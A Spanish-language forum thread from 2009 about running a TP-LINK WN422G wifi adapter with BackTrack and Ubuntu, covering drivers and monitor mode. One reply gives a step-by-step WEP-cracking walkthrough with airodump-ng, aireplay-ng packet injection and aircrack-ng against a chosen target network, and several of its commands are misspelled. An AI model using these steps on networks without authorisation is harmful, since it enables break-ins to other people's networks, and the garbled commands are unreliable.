?>/script>'; } ?> TP-LINK WN422G Widgets Magazine

Autor Tema: TP-LINK WN422G  (Leído 7476 veces)

0 Usuarios y 1 Visitante están viendo este tema.

darthtraya

  • Visitante
TP-LINK WN422G
« en: 09-09-2009, 15:22 (Miércoles) »
Hola a todos me acabo de comprar un TP-LINK WN422G usb y pensaba usarlo con backtrack 4 pero cuando uso airodump-ng no descubre ninguna red inalámbrica, y en ubuntu tampoco me sale ninguna, pero en windows sí, después de instalar los drivers, lógicamente. Alguien sabe dónde puedo encontrar los controladores para linux de esta tarjeta o si están incorporados en algún otro live cd? también tengo problemas con el comando airodump-ng con una conceptronic c300ru, no descubre ninguna red en con airodump-ng pero en windows sí, con esta tarjeta esto solo me pasa en otro ordenador, en el mío no, qué hago mal?

arkwired

  • Visitante
Re: TP-LINK WN422G
« Respuesta #1 en: 10-09-2009, 01:37 (Jueves) »
personalmente yo no utiliso el back track


pero en mi caso ke tengo una tp-link550g pci con chip atheros en wi fi slax no me la detectava asta que actives en la configuracion el chip de tu tarjeta en modo monitor

en caso que quieras conectarte en modo manager

espero que te sea de ayuda

nek97

  • Visitante
Re: TP-LINK WN422G
« Respuesta #2 en: 18-09-2009, 20:37 (Viernes) »
y como debo activar o configurar el chip de mi tarjeta en modo monitior??? pofa solo me falta esoo ???

skan

  • Visitante
Re: TP-LINK WN422G
« Respuesta #3 en: 26-09-2009, 15:29 (Sábado) »
Debes instalar el compat-wireless, que incluye un pack de muchos controladores. Y tienes que patchear. Entra en su web y lo verás.
Yo también me compré esta tarjeta y no mefunciona demasiado bien.
El linux vas probando diferentes compat-wireless hasta que encuentras uno que funciona pero cuando actualizas cosas de linux suele dejar de funcionar bien.

En cualquier caso el aireplay-ng -1 ...  no funciona bien

Y bajo Windows xp no me funciona la aplicación oficial de TP-Link.


thedoctor77

  • Visitante
Re: TP-LINK WN422G
« Respuesta #4 en: 29-09-2009, 00:48 (Martes) »
busca un link de WooX, ahi viene todo bien explicadito, un saludo!!

latigokiller

  • Visitante
Re: TP-LINK WN422G
« Respuesta #5 en: 01-12-2009, 23:47 (Martes) »
descargate el ubuntu 9.10 , ya esta instalada y segun todo el mundo puede inyectar

alejandrojuarez

  • Visitante
Re: TP-LINK WN422G
« Respuesta #6 en: 28-12-2009, 04:02 (Lunes) »
hola saludos tengo la tarjeta que mencionas primero tienes q bajarte la version de bactrack 4 iso DVD luego
1.- abres console tecleas el comando iwconfig
te da un wlan0, o wifi0 con esto identifica tu tarjeta
2.- abres console exploraremos todas las redes disponibles airodump-ng wlan0 o wifi0
ya exploradas todas las redes pulsamos control+C y elegimos la red a vulnerar y copiamos su MAC o BSSID
3.- abres console airodum-ng -c (canal de transmision, columna CH) -w (nombre del archivo de captura) --bssid (Mac del router de red destino que copiamos) wlan0 o wifi0 cualquiera que te haya dentificado tu tarjeta
para mi caso quedo asi con una mac cualquiera con espacios adecuados
airodump-n -c 3 -w alejandro --bssid 00:21:7B:D0:72:88 wlan0
4.- abres una nueva ventana y la siguiente instruccion es para asociarte al router destino autentificacion
ireplay-ng  -1  0 -a (Mac de router de red destino que copiamos) -h (Mac de nuestra tarjeta de red) wlan0 para mi ejemplo:
areplay-ng -1  0  -a  00:21:7B:D0:72:88  -h 00:26:E5:E3:67:32 wlan0 sies correcta la autentificacion nos regresara una carita felix como esta -->:-
5.-seguido sibien es logrado colocamos el siguiente codigo para la inyeccion de paquetes
aireplay-ng -2  -p  0841  -c  FF:FF:FF:FF:FF:FF  -b(Mac de router de red destino)  -h 00:26:E5:E3:67:32 wlan0 s es correcto nos aparacera un mensaje si queremos usar el paquete q nos muestra le decinos q yes
para mi ejemplo: aireplay-ng -2  -p  0841  -c  FF:FF:FF:FF:FF:FF  -b 00:21:7B:D0:72:88  -h 00:26:E5:E3:67:32 wlan0
hecho todo lo anterior solo nos resta esperar un poco a que le valor de la columna data comience a aumentar pasados los 10.000 datos intercambiados abrimos una nueva consola y escribimos:
6.- aircrack-ng (nombre q le dieron al archivo de captura)-cap  para mi ejem:
aircrack-ng alejandro-01.cap     debe de ir a fuerzas con la extencion -01.cap
espero le sea de gran ayuda

frakc

  • Visitante
Re: TP-LINK WN422G
« Respuesta #7 en: 08-02-2010, 12:30 (Lunes) »
Hola darthtraya
si tienes la vercion 2 del WN422G, aparamente aqui tienes unas buenas noticias:
http://linuxwireless.org/en/users/Drivers/ath9k_htc/devices
Hace mui poco quel WN422G esta en la lista de hardwares compatibles con este driver nuevo, el ath9k_htc
http://linuxwireless.org/en/users/Drivers/ath9k_htc
Tengo mucha curiosidad para saber como se comporta con aircrack... si alguien ha podido jugar con el ath9k_htc, por favor, cuentanos xd